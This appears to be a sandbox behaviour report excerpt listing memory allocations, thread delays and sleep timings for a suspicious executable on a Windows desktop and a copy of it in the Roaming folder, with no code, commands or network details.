Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: 2630000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: 8CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: 6BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: 9CF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: ACF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: B120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: C120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: D120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: 30C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: E70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: 4960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: 86A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: 7070000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: 96A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: A6A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: AC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: BC40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: 15A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: 2F50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Memory allocated: 4F50000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599651	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599204	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598968	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598859	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598749	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598630	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598280	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598137	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597882	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597756	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597529	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597395	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 596059	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 595076	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594749	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599108
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598891
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598671
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594599
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594469
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Thread delayed: delay time: 594110

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8829	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 688	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8161	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Window / User API: threadDelayed 3258	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe	Window / User API: threadDelayed 6587	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Window / User API: threadDelayed 7184
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe	Window / User API: threadDelayed 2644

Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7908	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1516	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 5676	Thread sleep count: 3258 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 5676	Thread sleep count: 6587 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -599651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -599204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598630s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598280s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598137s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -597882s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -597756s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -597640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -597529s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -597395s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -597046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -596059s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595296s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -595076s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -594968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -594859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -594749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -594640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -594421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ckHregxJIq.exe TID: 7940	Thread sleep time: -594312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 1256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 6028	Thread sleep count: 7184 > 30
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 6028	Thread sleep count: 2644 > 30
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599764s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599328s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599219s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599108s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -599000s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -598891s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -598781s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -598671s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -598313s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -598094s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -595735s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -595485s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -595360s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -594599s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -594469s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exe TID: 5284	Thread sleep time: -594110s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ckHregxJIq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
